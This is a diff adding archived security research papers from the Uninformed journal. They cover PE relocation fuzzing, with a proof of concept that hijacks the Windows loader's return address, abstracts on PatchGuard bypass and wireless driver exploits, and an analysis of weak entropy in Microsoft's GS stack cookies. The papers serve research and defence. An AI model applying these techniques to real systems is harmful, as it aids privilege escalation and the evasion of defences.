ntdll!LdrProcessRelocationBlockLongLong+0x1a:
|
||||
7c91e163 0fb706 movzx eax,word ptr [esi] ds:0023:00015000=????
|
||||
|
||||
IDA: Ignores the relocation block, but may not process relocations correctly
|
||||
as a result (unclear at this point).
|
||||
|
||||
dumpbin.exe: Refuses to show relocations:
|
||||
|
||||
Microsoft (R) COFF/PE Dumper Version 8.00.50727.42
|
||||
Copyright (C) Microsoft Corporation. All rights reserved.
|
||||
|
||||
Dump of file foo.exe
|
||||
|
||||
File Type: EXECUTABLE IMAGE
|
||||
|
||||
BASE RELOCATIONS #4
|
||||
|
||||
Summary
|
||||
|
||||
1000 .data
|
||||
1000 .rdata
|
||||
1000 .reloc
|
||||
1000 .text
|
||||
|
||||
A.5) Consistent Handling of Fixup Types
|
||||
|
||||
Applications that process relocation fixups may also differ in their level of
|
||||
support for different types of fixups. While most binaries today use the
|
||||
HIGHLOW fixup exclusively, there are still quite a few other types of fixups
|
||||
that can be applied. If differences in the way relocation fixups are
|
||||
processed can be identified, it may be possible to create a binary that
|
||||
relocates correctly in one application but not in another application. The
|
||||
following code demonstrates an example of this type of test:
|
||||
|
||||
static VOID TestConsistentRelocations(
|
||||
__in PPE_IMAGE Image,
|
||||
__in PRELOC_FUZZ_CONTEXT FuzzContext)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT Block = AllocateRelocationBlockContext(16);
|
||||
ULONG Rva = FuzzContext->BaseRelocationSection->VirtualAddress;
|
||||
INT Index;
|
||||
|
||||
PrependRelocationBlockContext(
|
||||
FuzzContext,
|
||||
Block);
|
||||
|
||||
Block->Rva = 0x1000;
|
||||
|
||||
for (Index = 0; Index < 16; Index++)
|
||||
{
|
||||
//
|
||||
// Skip invalid fixup types
|
||||
//
|
||||
if ((Index >= 6 && Index <= 8) ||
|
||||
(Index >= 0xb && Index <= 0x10))
|
||||
continue;
|
||||
|
||||
Block->Fixups[Index] = (Index << 12) | Index;
|
||||
}
|
||||
}
|
||||
|
||||
This test works by prepending a relocation block that contains a relocation
|
||||
fixup for each different valid fixup type. This results in a relocation block
|
||||
that looks something like this:
|
||||
|
||||
BASE RELOCATIONS #4
|
||||
1000 RVA, 28 SizeOfBlock
|
||||
0 ABS
|
||||
1 HIGH EC8B
|
||||
2 LOW 8BEC
|
||||
3 HIGHLOW 5008458B
|
||||
4 HIGHADJ 0845 (5005)
|
||||
0 ABS
|
||||
0 ABS
|
||||
0 ABS
|
||||
9 IMM64
|
||||
A DIR64 8000209C15FF8000
|
||||
0 ABS
|
||||
0 ABS
|
||||
0 ABS
|
||||
0 ABS
|
||||
0 ABS
|
||||
|
||||
The results for this test are shown below:
|
||||
|
||||
|
||||
ntdll.dll: While not confirmed, it is assumed that the dynamic loader performs
|
||||
all fixup types correctly. This results in the following code being produced
|
||||
in the test binary:
|
||||
|
||||
foo+0x1000:
|
||||
00011000 55 push ebp
|
||||
00011001 8c6c8b46 mov word ptr [ebx+ecx*4+46h],gs
|
||||
00011005 895068 mov dword ptr [eax+68h],edx
|
||||
00011008 1830 sbb byte ptr [eax],dh
|
||||
0001100a 0100 add dword ptr [eax],eax
|
||||
0001100c 00b69b200100 add byte ptr foo+0x209b (0001209b)[esi],dh
|
||||
00011012 83c408 add esp,8
|
||||
|
||||
IDA: Appears to handle some relocation fixup types differently than the
|
||||
dynamic loader. The result of IDA relocating the same binary results in the
|
||||
following being produced:
|
||||
|
||||
.text:00011000 push ebp
|
||||
.text:00011001 mov ebp, esp
|
||||
.text:00011003 mov eax, [ebp+9]
|
||||
.text:00011006 shr byte ptr [eax+18h], 1 ; "Called TestFunction()\n"
|
||||
.text:00011009 xor [ecx], al
|
||||
.text:00011009
|
||||
.text:0001100B db 0
|
||||
.text:0001100C
|
||||
.text:0001100C add byte ptr ds:printf[esi], dl
|
||||
.text:00011012 add esp, 8
|
||||
|
||||
Equates to:
|
||||
|
||||
.text:00011000 55 8B EC 8B 45 09 D0 68 18 30 01 00 00 96 9C 20
|
||||
.text:00011010 01 00 83 C4 08 C7 05 50
|
||||
|
||||
dumpbin.exe: N/A, dumpbin doesn't actually perform relocation fixups.
|
||||
|
||||
A.6) Hijacking the Dynamic Loader
|
||||
|
||||
Since the dynamic loader in previous tests proved to be capable of writing to
|
||||
areas of memory external to the executable binary, it makes sense to test to
|
||||
see if it's possible to hijack execution control. One method of approaching
|
||||
this would be to have the dynamic loader apply a relocation to the return
|
||||
address of the function used to process relocations. When the function
|
||||
returns, it'll transfer control to whatever address the relocations have
|
||||
caused it to point to. An example of this code for this test is shown below:
|
||||
|
||||
static VOID TestHijackLoader(
|
||||
__in PPE_IMAGE Image,
|
||||
__in PRELOC_FUZZ_CONTEXT FuzzContext)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT Block = AllocateRelocationBlockContext(1);
|
||||
|
||||
PrependRelocationBlockContext(
|
||||
FuzzContext,
|
||||
Block);
|
||||
|
||||
//
|
||||
// Set the RVA to the address of the return address on the stack taking into
|
||||
// account the displacement.
|
||||
//
|
||||
Block->Rva = 0x0012fab0;
|
||||
Block->Fixups[0] = (3 << 12) | 0;
|
||||
}
|
||||
|
||||
When a binary is executed that contains this relocation block, the dynamic
|
||||
loader ends up applying a relocation to the return address located at
|
||||
0x13fab0. Obviously, this address may be subject to change quite frequently,
|
||||
but as a means of illustrating a proof of concept it should be sufficient.
|
||||
And, just as one would expect, the dynamic loader does indeed overwrite the
|
||||
return address and make it possible to gain control of execution:
|
||||
|
||||
(c88.184): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=0001400a ebx=00014008 ecx=0013fab0 edx=80010000 esi=00000001
|
||||
edi=ffffffff eip=fc92e10b esp=0013fac8 ebp=0013fae4 iopl=0 nv up ei pl zr na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
|
||||
fc92e10b ?? ???
|
||||
0:000> kv
|
||||
ChildEBP RetAddr Args to Child
|
||||
WARNING: Frame IP not in any known module. Following frames may be wrong.
|
||||
0013fac4 00010000 00261f18 7ffdc000 80010000 0xfc92e10b
|
||||
0013fae4 7c91e08c 00010000 00000000 00000000 image00010000
|
||||
0013fb08 7c93ecd3 00010000 7c93f584 00000000 ntdll!LdrRelocateImage+0x1d (FPO: [Non-Fpo])
|
||||
0013fc94 7c921639 0013fd30 7c900000 0013fce0 ntdll!LdrpInitializeProcess+0xea0 (FPO: [Non-Fpo])
|
||||
0013fd1c 7c90eac7 0013fd30 7c900000 00000000 ntdll!_LdrpInitialize+0x183 (FPO: [Non-Fpo])
|
||||
00000000 00000000 00000000 00000000 00000000 ntdll!KiUserApcDispatcher+0x7
|
||||
|
||||
Bibliography
|
||||
|
||||
[1] Carrera, Ero. Packer Tracing.
|
||||
http://nzight.blogspot.com/2006/06/packer-tracing.html;
|
||||
accessed Dec 15, 2006.
|
||||
|
||||
[2] Szor, Peter. Advanced Code Evolution Techniques and Computer Virus Generator Kits.
|
||||
http://www.informit.com/articles/article.asp?p=366890&seqNum=3&rl=1;
|
||||
accessed Jan 8, 2007.
|
||||
|
||||
[3] Szor, Peter. Tricky Relocations.
|
||||
http://peterszor.com/resurrel.pdf;
|
||||
accessed Jan 8, 2007.
|
1570
uninformed/6.3.txt
Normal file
1570
uninformed/6.3.txt
Normal file
File diff suppressed because it is too large
Load diff
17
uninformed/6.txt
Normal file
17
uninformed/6.txt
Normal file
|
@ -0,0 +1,17 @@
|
|||
Engineering in Reverse
|
||||
Subverting PatchGuard Version 2
|
||||
Skywing
|
||||
Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely. Potential solutions to these bypass techniques are also suggested. Additionally, this paper describes a mechanism by which PatchGuard version 2 can be subverted to run custom code in place of PatchGuard's system integrity checking code, all while leaving no traces of any kernel patching or custom kernel drivers loaded in the system after PatchGuard has been subverted. This is particularly interesting from the perspective of using PatchGuard's defenses to hide kernel mode code, a goal that is (in many respects) completely contrary to what PatchGuard is designed to do.
|
||||
pdf | txt | code.tgz | html
|
||||
|
||||
Locreate: An Anagram for Relocate
|
||||
skape
|
||||
This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation. This difference can make binaries packed using this technique more difficult to signature and analyze, but only when presented to an untrained eye. The description of this technique is meant to be an example of a fun thought exercise and not as some sort of revolutionary packer. In fact, it's been used in the virus world many years prior to this paper.
|
||||
pdf | txt | code.tgz | html
|
||||
|
||||
Exploitation Technology
|
||||
Exploiting 802.11 Wireless Driver Vulnerabilities on Windows
|
||||
Johnny Cache, H D Moore, skape
|
||||
This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation. The pre-exploitation step provides a basic introduction to the 802.11 protocol along with a description of the tools and libraries the authors used to create a basic 802.11 protocol fuzzer. The exploitation step describes the common elements of an 802.11 wireless device driver exploit. These elements include things like the underlying payload architecture that is used when executing arbitrary code in kernel-mode on Windows, how this payload architecture has been integrated into the 3.0 version of the Metasploit Framework, and the interface that the Metasploit Framework exposes to make developing 802.11 wireless device driver exploits easy. Finally, three separate real world wireless device driver vulnerabilities are used as case studies to illustrate the application of this process. It is hoped that the description and illustration of this process can be used to show that kernel-mode vulnerabilities can be just as dangerous and just as easy to exploit as user-mode vulnerabilities. In so doing, awareness of the need for more robust kernel-mode exploit prevention technology can be raised.
|
||||
pdf | txt | code.tgz | html
|
||||
|
958
uninformed/7.1.txt
Normal file
958
uninformed/7.1.txt
Normal file
|
@ -0,0 +1,958 @@
|
|||
Reducing the Effective Entropy of GS Cookies
|
||||
skape
|
||||
mmiller@hick.org
|
||||
3/2007
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: This paper describes a technique that can be used to reduce the
|
||||
effective entropy in a given GS cookie by roughly 15 bits. This reduction is
|
||||
made possible because GS uses a number of weak entropy sources that can, with
|
||||
varying degrees of accuracy, be calculated by an attacker. It is important to
|
||||
note, however, that the ability to calculate the values of these sources for
|
||||
an arbitrary cookie currently relies on an attacker having local access to the
|
||||
machine, such as through the local console or through terminal services. This
|
||||
effectively limits the use of this technique to stack-based local privilege
|
||||
escalation vulnerabilities. In addition to the general entropy reduction
|
||||
technique, this paper discusses the amount of effective entropy that exists in
|
||||
services that automatically start during system boot. It is hypothesized that
|
||||
these services may have more predictable states of entropy due to the relative
|
||||
consistency of the boot process. While the techniques described in this paper
|
||||
do not illustrate a complete break of GS, any inherent weakness can have
|
||||
disastrous consequences given that GS is a static, compile-time security
|
||||
solution. It is not possible to simply distribute a patch. Instead,
|
||||
applications must be recompiled to take advantage of any security
|
||||
improvements. In that vein, the paper proposes some solutions that could
|
||||
be applied to address the problems that are outlined.
|
||||
|
||||
Thanks: Aaron Portnoy for lending some hardware for sample collection.
|
||||
Johnny Cache and Richard Johnson for discussions and suggestions.
|
||||
|
||||
2) Introduction
|
||||
|
||||
Stack-based buffer overflows are generally regarded as one of the most common
|
||||
and easiest to exploit classes of software vulnerabilities. This prevalence
|
||||
has lead to the implementation of many security solutions that attempt to
|
||||
prevent the exploitation of these vulnerabilities. Some of these solutions
|
||||
include StackGuard[1], ProPolice[2], and Microsoft's /GS compiler switch[5]. The
|
||||
shared premise of these solutions involves the placement of a cookie, or
|
||||
canary, between the buffers stored in a stack frame and the stack frame's
|
||||
return address. The cookie that is placed on the stack is used as a marker to
|
||||
detect if a buffer overflow has occurred prior to allowing a function to
|
||||
return. This simple concept can be very effective at making the exploitation
|
||||
of stack-based buffer overflows unreliable.
|
||||
|
||||
The cookie-based approach to detecting stack-based buffer overflows involves
|
||||
three general steps. First, a cookie that will be inserted into a function's
|
||||
stack frame must be generated. The approaches taken to generate cookies vary
|
||||
quite substantially, some having more implications than others. Once a cookie
|
||||
has been generated, it must be pushed onto the stack in the context of a
|
||||
function's prologue at execution time. This ensures that the cookie is placed
|
||||
before the return address (and perhaps other values) on the stack. Finally, a
|
||||
check must be added to a function's epilogue to make sure that the cookie that
|
||||
was stored in the stack frame is the value that it was initialized to in the
|
||||
function prologue. If an overflow of a stack-based buffer occurs, then it's
|
||||
likely that it will have overwritten the cookie stored after the buffer. When
|
||||
a mismatch is detected, steps can be taken to securely terminate the process
|
||||
in a way that will prevent exploitation.
|
||||
|
||||
The security of a cookie-based solution hinges on the fact that an attacker
|
||||
doesn't know, or is unable to generate, the cookie that is stored in a stack
|
||||
frame. Since it's impossible to guarantee in all situations that an attacker
|
||||
won't be able to generate the bytes that compose the value of a cookie, it
|
||||
really all boils down to the cookie being kept secret. If the cookie is not
|
||||
kept secret, then the presence of a cookie will provide no protection when it
|
||||
comes to exploiting a stack-based buffer overflow vulnerability.
|
||||
Additionally, if an attacker can trigger an exploitable condition before the
|
||||
cookie is checked, then it stands that the cookie will provide no protection.
|
||||
One example of this might include overwriting a function pointer on the stack
|
||||
that is called prior to returning from the function.
|
||||
|
||||
While the StackGuard and ProPolice implementations are interesting and useful,
|
||||
the author feels that no implementation is more critical than the one provided
|
||||
by Microsoft. The reason for this is the simple fact that the vast majority
|
||||
of all desktops, and a non-trivial number of servers, run applications
|
||||
compiled with Microsoft's Visual C compiler. Any one weakness found in the
|
||||
Microsoft's implementation could mean that a large number of applications are
|
||||
no longer protected against stack-based buffer overflows. In fact, there has
|
||||
been previous research that has pointed out flaws or limitations in
|
||||
Microsoft's implementation. For example, David Litchfield pointed out that
|
||||
even though stack cookies are present, it may still be possible to overwrite
|
||||
exception registration records on the stack which may be called before the
|
||||
function actually returns. This discovery was one of the reasons that
|
||||
Microsoft later introduced SafeSEH (which had its own set of issues)[6].
|
||||
Similarly, Chris Ren et al from Cigital pointed out the potential implications
|
||||
of a function pointer being used in the path of the error handler for the case
|
||||
of a GS cookie mismatch occurring[9]. While not directly related to a particular
|
||||
flaw or limitation in GS, eEye has described some of the problems that come
|
||||
when secrets get leaked[3].
|
||||
|
||||
Even though these issues and limitations have existed, Microsoft's GS
|
||||
implementation at the time of this writing is considered by most to be secure.
|
||||
While this paper will not present a complete break of Microsoft's GS
|
||||
implementation, it will describe certain quirks and scenarios that may make it
|
||||
possible to reduce the amount of effective entropy that exists in the cookies
|
||||
that are generated. As with cryptography, any reduction of the entropy that
|
||||
exists in the GS cookie effectively makes it so there are fewer unknown
|
||||
portions of the cookie. This makes the cookie easier to guess by reducing the
|
||||
total number of possibilities. Beyond this, it is expected that additional
|
||||
research may find ways to further reduce the amount of entropy beyond that
|
||||
described in this document. One critical point that must be made is that
|
||||
since the current GS implementation is statically linked when binaries are
|
||||
compiled, any flaw that is found in the implementation will require a
|
||||
recompilation of all binaries affected by it. To help limit the scope, only
|
||||
the 32-bit version of GS will be analyzed, though it is thought that similar
|
||||
attacks may exist on the 64-bit version as well.
|
||||
|
||||
The structure of this paper is as follows. In chapter 3, a brief description
|
||||
of the Microsoft's current GS implementation will be given. Chapter 4 will
|
||||
describe some techniques that may be used to attack this implementation.
|
||||
Chapter 5 will provide experimental results from using the attacks that are
|
||||
described in chapter . Chapter 6 will discuss steps that could be taken to
|
||||
improve the current GS implementation. Finally, chapter 7 will discuss some
|
||||
areas where future work could be applied to further improve on the techniques
|
||||
described in this document.
|
||||
|
||||
3) Implementation
|
||||
|
||||
As was mentioned in the introduction, security solutions that are designed to
|
||||
protect against stack-based buffer overflows through the use of cookies tend
|
||||
to involve three distinct steps: cookie generation, prologue modifications,
|
||||
and epilogue modifications. Microsoft's GS implementation is no different.
|
||||
This chapter will describe each of these three steps independent of one
|
||||
another to paint a picture for how GS operates.
|
||||
|
||||
3.1) Cookie Generation
|
||||
|
||||
Microsoft chose to have the GS implementation generate an image file-specific
|
||||
cookie. This means that each image file (executable or DLL) will have their
|
||||
own unique cookie. When used in conjunction with a stack frame, a function
|
||||
will insert its image file-specific cookie into the stack frame. This will be
|
||||
covered in more detail in the next section. The actual approach taken to
|
||||
generate an image file's cookie lives in a compiler inserted routine called
|
||||
__security_init_cookie. This routine is placed prior to the call to the image
|
||||
file's actual entry point routine and therefore is one of the first things
|
||||
executed. By placing it at this point, all of the image file's code will be
|
||||
protected by the GS cookie.
|
||||
|
||||
The guts of the __security_init_cookie routine are actually the most critical part
|
||||
to understand. At a high-level, this routine will take an XOR'd combination
|
||||
of the current system time, process identifier, thread identifier, tick count,
|
||||
and performance counter. The end result of XOR'ing these values together is
|
||||
what ends up being the image file's security cookie. To understand how this
|
||||
actually works in more detail, consider the following disassembly from an
|
||||
application compiled with version 14.00.50727.42 of Microsoft's compiler.
|
||||
Going straight to the disassembly is the best way to concretely understand the
|
||||
implementation, especially if one is in search of weaknesses.
|
||||
|
||||
Like all functions, the __security_init_cookie function starts with a prologue.
|
||||
It allocates storage for some local variables and initializes some of them to
|
||||
zero. It also initializes some registers, specifically edi and ebx which will
|
||||
be used later on.
|
||||
|
||||
.text:00403D58 push ebp
|
||||
.text:00403D59 mov ebp, esp
|
||||
.text:00403D5B sub esp, 10h
|
||||
.text:00403D5E mov eax, __security_cookie
|
||||
.text:00403D63 and [ebp+SystemTimeAsFileTime.dwLowDateTime], 0
|
||||
.text:00403D67 and [ebp+SystemTimeAsFileTime.dwHighDateTime], 0
|
||||
.text:00403D6B push ebx
|
||||
.text:00403D6C push edi
|
||||
.text:00403D6D mov edi, 0BB40E64Eh
|
||||
.text:00403D72 cmp eax, edi
|
||||
.text:00403D74 mov ebx, 0FFFF0000h
|
||||
|
||||
As part of the end of the code above, a comparison between the current
|
||||
security cookie and a constant 0xbb40e64e is made. Before __security_init_cookie
|
||||
is called, the global securitycookie is initialized to 0xbb40e64e. The
|
||||
constant comparison is used to see if the GS cookie has already been
|
||||
initialized. If the current cookie is equal to the constant, or the high
|
||||
order two bytes of the current cookie are zero, then a new cookie is
|
||||
generated. Otherwise, the complement of the current cookie is calculated and
|
||||
cookie generation is skipped.
|
||||
|
||||
.text:00403D79 jz short loc_403D88
|
||||
.text:00403D7B test eax, ebx
|
||||
.text:00403D7D jz short loc_403D88
|
||||
.text:00403D7F not eax
|
||||
.text:00403D81 mov __security_cookie_complement, eax
|
||||
.text:00403D86 jmp short loc_403DE8
|
||||
|
||||
To generate a new cookie, the function starts by querying the current system
|
||||
time using GetSystemTimeAsFileTime. The system time as represented by Windows
|
||||
is a 64-bit integer that measures the system time down to a granularity of 100
|
||||
nanoseconds. The high order 32-bit integer and the low order 32-bit integer
|
||||
are XOR'd together to produce the first component of the cookie. Following
|
||||
that, the current process identifier is queried using GetCurrentProcessId and
|
||||
then XOR'd as the second component of the cookie. The current thread
|
||||
identifier is then queried using GetCurrentThreadId and then XOR'd as the
|
||||
third component of the cookie. The current tick count is queried using
|
||||
GetTickCount and then XOR'd as the fourth component of the cookie. Finally,
|
||||
the current performance counter value is queried using
|
||||
QueryPerformanceCounter. Like system time, this value is also a 64-bit
|
||||
integer, and its high order 32-bit integer and low order 32-bit integer are
|
||||
XOR'd as the fifth component of the cookie. Once these XOR operations have
|
||||
completed, a comparison is made between the newly generated cookie value and
|
||||
the constant 0xbb40e64e. If the new cookie is not equal to the constant
|
||||
value, then a second check is made to make sure that the high order two bytes
|
||||
of the cookie are non-zero. If they are zero, then a 10 bit left shift of the
|
||||
cookie is performed in order to seed the high order bytes.
|
||||
|
||||
.text:00403D89 lea eax, [ebp+SystemTimeAsFileTime]
|
||||
.text:00403D8C push eax
|
||||
.text:00403D8D call ds:__imp__GetSystemTimeAsFileTime@4
|
||||
.text:00403D93 mov esi, [ebp+SystemTimeAsFileTime.dwHighDateTime]
|
||||
.text:00403D96 xor esi, [ebp+SystemTimeAsFileTime.dwLowDateTime]
|
||||
.text:00403D99 call ds:__imp__GetCurrentProcessId@0
|
||||
.text:00403D9F xor esi, eax
|
||||
.text:00403DA1 call ds:__imp__GetCurrentThreadId@0
|
||||
.text:00403DA7 xor esi, eax
|
||||
.text:00403DA9 call ds:__imp__GetTickCount@0
|
||||
.text:00403DAF xor esi, eax
|
||||
.text:00403DB1 lea eax, [ebp+PerformanceCount]
|
||||
.text:00403DB4 push eax
|
||||
.text:00403DB5 call ds:__imp__QueryPerformanceCounter@4
|
||||
.text:00403DBB mov eax, dword ptr [ebp+PerformanceCount+4]
|
||||
.text:00403DBE xor eax, dword ptr [ebp+PerformanceCount]
|
||||
.text:00403DC1 xor esi, eax
|
||||
.text:00403DC3 cmp esi, edi
|
||||
.text:00403DC5 jnz short loc_403DCE
|
||||
...
|
||||
.text:00403DCE loc_403DCE:
|
||||
.text:00403DCE test esi, ebx
|
||||
.text:00403DD0 jnz short loc_403DD9
|
||||
.text:00403DD2 mov eax, esi
|
||||
.text:00403DD4 shl eax, 10h
|
||||
.text:00403DD7 or esi, eax
|
||||
|
||||
Finally, when a valid cookie is generated, it's stored in the image file's
|
||||
securitycookie. The bit-wise complement of the cookie is also stored in
|
||||
securitycookiecomplement. The reason for the existence of the complement will
|
||||
be described later.
|
||||
|
||||
.text:00403DD9 mov __security_cookie, esi
|
||||
.text:00403DDF not esi
|
||||
.text:00403DE1 mov __security_cookie_complement, esi
|
||||
.text:00403DE7 pop esi
|
||||
.text:00403DE8 pop edi
|
||||
.text:00403DE9 pop ebx
|
||||
.text:00403DEA leave
|
||||
.text:00403DEB retn
|
||||
|
||||
In simpler terms, the meat of the cookie generation can basically be
|
||||
summarized through the following pseudo code:
|
||||
|
||||
Cookie = SystemTimeHigh
|
||||
Cookie ^= SystemTimeLow
|
||||
Cookie ^= ProcessId
|
||||
Cookie ^= ThreadId
|
||||
Cookie ^= TickCount
|
||||
Cookie ^= PerformanceCounterHigh
|
||||
Cookie ^= PerformanceCounterLow
|
||||
|
||||
3.2) Prologue Modifications
|
||||
|
||||
In order to make use of the generated cookie, functions must be modified to
|
||||
insert it into the stack frame at the time that they are called. This does
|
||||
add some overhead to the call time associated with a function, but its overall
|
||||
effect is linear with respect to a single invocation. The actual
|
||||
modifications that are made to a function's prologue typically involve just
|
||||
three instructions. The cookie that was generated for the image file is XOR'd
|
||||
with the current value of the frame pointer. This value is then placed in the
|
||||
current stack frame at a precisely chosen location by the compiler.
|
||||
|
||||
.text:0040214B mov eax, __security_cookie
|
||||
.text:00402150 xor eax, ebp
|
||||
.text:00402152 mov [ebp+2A8h+var_4], eax
|
||||
|
||||
It should be noted that Microsoft has taken great care to refine the way a
|
||||
stack frame is laid out in the presence of GS. Locally defined pointers,
|
||||
including function pointers, are placed before statically sized buffers in the
|
||||
stack frame. Additionally, dangerous input parameters passed to the function,
|
||||
such as pointers or structures that contain pointers, will have local copies
|
||||
made that are positioned before statically sized local buffers. The local
|
||||
copies of these parameters are used instead of those originally passed to the
|
||||
function. These two changes go a long way toward helping to prevent other
|
||||
scenarios in which stack-based buffer overflows might be exploited.
|
||||
|
||||
3.3) Epilogue Modifications
|
||||
|
||||
When a function returns, it must check to make sure that the cookie that was
|
||||
stored on the stack has not been tampered with. To accomplish this, the
|
||||
compiler inserts the following instructions into a function's prologue:
|
||||
|
||||
.text:00402223 mov ecx, [ebp+2A8h+var_4]
|
||||
.text:00402229 xor ecx, ebp
|
||||
.text:0040222B pop esi
|
||||
.text:0040222C call __security_check_cookie
|
||||
|
||||
The value of the cookie that was stored on the stack is moved into ecx and
|
||||
then XOR'd with the current frame pointer to get it back to the expected
|
||||
value. Following that, a call is made to securitycheckcookie where the stack
|
||||
frame's cookie value is passed in the ecx register. The securitycheckcookie
|
||||
routine is very short and sweet. The passed in cookie value is compared with
|
||||
the image file's global cookie. If they don't match, reportgsfailure is
|
||||
called and the process eventually terminates. This is what one would expect
|
||||
in the case of a buffer overflow scenario. However, if they do match, the
|
||||
routine simply returns, allowing the calling function to proceed with
|
||||
execution and cleanup.
|
||||
|
||||
.text:0040634B cmp ecx, __security_cookie
|
||||
.text:00406351 jnz short loc_406355
|
||||
.text:00406353 rep retn
|
||||
.text:00406355 loc_406355:
|
||||
.text:00406355 jmp __report_gsfailure
|
||||
|
||||
4) Attacking GS
|
||||
|
||||
At the time of this writing, all publicly disclosed attacks against GS that
|
||||
the author is aware of have relied on getting control of execution before the
|
||||
cookie is checked or by finding some way to leak the value of the cookie back
|
||||
to the attacker. Both of these styles of attack are of great interest and
|
||||
value, but the focus of this paper will be on a different method of attacking
|
||||
GS. Specifically, this chapter will outline techniques that may be used to
|
||||
make it easier to guess the value an image file's GS cookie. Two techniques
|
||||
will be described. The first technique will describe methods for calculating
|
||||
the values that were used as entropy sources when the cookie was generated.
|
||||
These calculations are possible in situations where an attacker has local
|
||||
access to the machine, such as through the console or through terminal
|
||||
services. The second technique describes the general concept of predictable
|
||||
ranges of some values that are used in the context of boot start services,
|
||||
such as lsass.exe. This predictability may make the guessing of a GS cookie
|
||||
more feasible in both local and remote scenarios.
|
||||
|
||||
4.1) Calculating Entropy Sources
|
||||
|
||||
The sources used to generate the GS cookie for a given image file are constant
|
||||
and well-known. They include the current system time, process identifier,
|
||||
thread identifier, tick count, and performance counter. In light of that
|
||||
fact, it only makes sense to investigate the amount of effective entropy each
|
||||
source adds to the cookie. Since it's a requirement that the cookie produced
|
||||
be secret, the ability to guess a value used in the generation of the cookie
|
||||
will allow it to be canceled out of the equation. This is true due to the
|
||||
simple fact that each of the values used to generate the cookie is XOR'd with
|
||||
each other value (XOR is a commutative operation). The ability to guess
|
||||
multiple values can make it possible to seriously impact the overall integrity
|
||||
of the cookie.
|
||||
|
||||
While the sources used in the generation of the cookie have long been regarded
|
||||
as satisfactory, the author has found that the majority of the sources
|
||||
actually contribute little to no value toward the overall entropy of the
|
||||
cookie. However, this is currently only true if an attacker has local access
|
||||
to the machine. Being able to know a GS cookie that was used in a privileged
|
||||
process would make it possible to exploit a local privilege escalation
|
||||
vulnerability, for example. There may be some circumstances where the
|
||||
techniques described in this section could be applied remotely, but for the
|
||||
purpose of this document, only the local scenario will be considered. The
|
||||
following subsections will outline methods that can be used to calculate or
|
||||
deterministically find the specific values that were used when a cookie was
|
||||
being generated in a particular process context. As a result of this
|
||||
analysis, it's become clear that the only particular variable source of true
|
||||
entropy for the GS cookie is the low 17 bits of the performance counter. All
|
||||
other sources can be reliably calculated, with some margin of error.
|
||||
|
||||
For the following subsections, a modified executable named vulnapp.exe was
|
||||
used to extract the information that was used at the time that a process
|
||||
executable's GS cookie was generated. In particular, __security_init_cookie was
|
||||
modified to jump into a function that saves the information used to generate
|
||||
the cookie. The implementation of this function is shown below for those who
|
||||
are curious:
|
||||
|
||||
//
|
||||
// The FramePointer is the value of EBP in the context of the
|
||||
// __security_init_cookie routine. The cookie is the actual,
|
||||
// resultant cookie value. GSContext is a global array.
|
||||
//
|
||||
VOID DumpInformation(
|
||||
PULONG FramePointer,
|
||||
ULONG Cookie)
|
||||
{
|
||||
GSContext[0] = FramePointer[-3];
|
||||
GSContext[1] = FramePointer[-4];
|
||||
GSContext[2] = FramePointer[-1];
|
||||
GSContext[3] = FramePointer[-2];
|
||||
GSContext[4] = GetCurrentProcessId();
|
||||
GSContext[5] = GetCurrentThreadId();
|
||||
GSContext[6] = GetTickCount();
|
||||
GSContext[7] = Cookie;
|
||||
}
|
||||
|
||||
4.1.1) System Time
|
||||
|
||||
System time is a value that one might regard as challenging to recover. After
|
||||
all, it seems impossible to get the 100 nanosecond granularity of the system
|
||||
time that was retrieved when a cookie was being generated. Quite the
|
||||
contrary, actually. There are a few key points that go into being able to
|
||||
recover the system time. First, it's a fact that even though the system time
|
||||
measures granularity in terms of 100 nanosecond intervals, it's really only
|
||||
updated every 15.625 milliseconds (or 10.1 milliseconds for more modern CPUs).
|
||||
To many, 15.625 may seem like an odd number, but for those familiar with the
|
||||
Windows thread scheduler, it can be recognized as the period of the timer
|
||||
interrupt. For that reason, the current system time is only updated as a
|
||||
result of the timer interrupt firing. This fact means that the alignment of
|
||||
the system time that is used when a cookie is generated is known.
|
||||
|
||||
Of more interest, though, is the relationship between the system time value
|
||||
and the creation time value associated with a process or its initial thread.
|
||||
Since the minimum granularity of the system time is 15.6 or 10.1 milliseconds,
|
||||
it follows that the granularity of the thread creation time will be the same.
|
||||
In terms of modern CPUs, 15.6 milliseconds is an eternity and is plenty long
|
||||
for the processor to execute all instructions from the creation of the thread
|
||||
to the generation of the security cookie. This fact means that it's
|
||||
possible to assume that the creation time of a process or thread is the
|
||||
same as the system time that was used when the cookie was generated. This
|
||||
assumption doesn't always work, though, and there are indeed cases where
|
||||
the creation time will not equal the system time that was used. These
|
||||
situations are usually a result of the thread that creates the cookie not
|
||||
being immediately scheduled.
|
||||
|
||||
Even if this is the case, it would be necessary to be able to obtain the
|
||||
creation time of an arbitrary process or thread. On the surface, this would
|
||||
seem impossible because task manager prevents a non-privileged user from
|
||||
getting the start time of a privileged process.
|
||||
|
||||
This is all a deception, though, because there does exist functionality that
|
||||
is exposed to non-privileged users that can be used to get this information.
|
||||
One way of getting it is through the use of the native API routine
|
||||
NtQuerySystemInformation. In this case, the
|
||||
SystemProcessesAndThreadsInformation system information class is used to query
|
||||
information about all of the running processes on the system. This
|
||||
information includes the process name, process creation time, and the creation
|
||||
time for each thread in each process. While this information class has been
|
||||
removed in Windows Vista, there are still potential ways of obtaining the
|
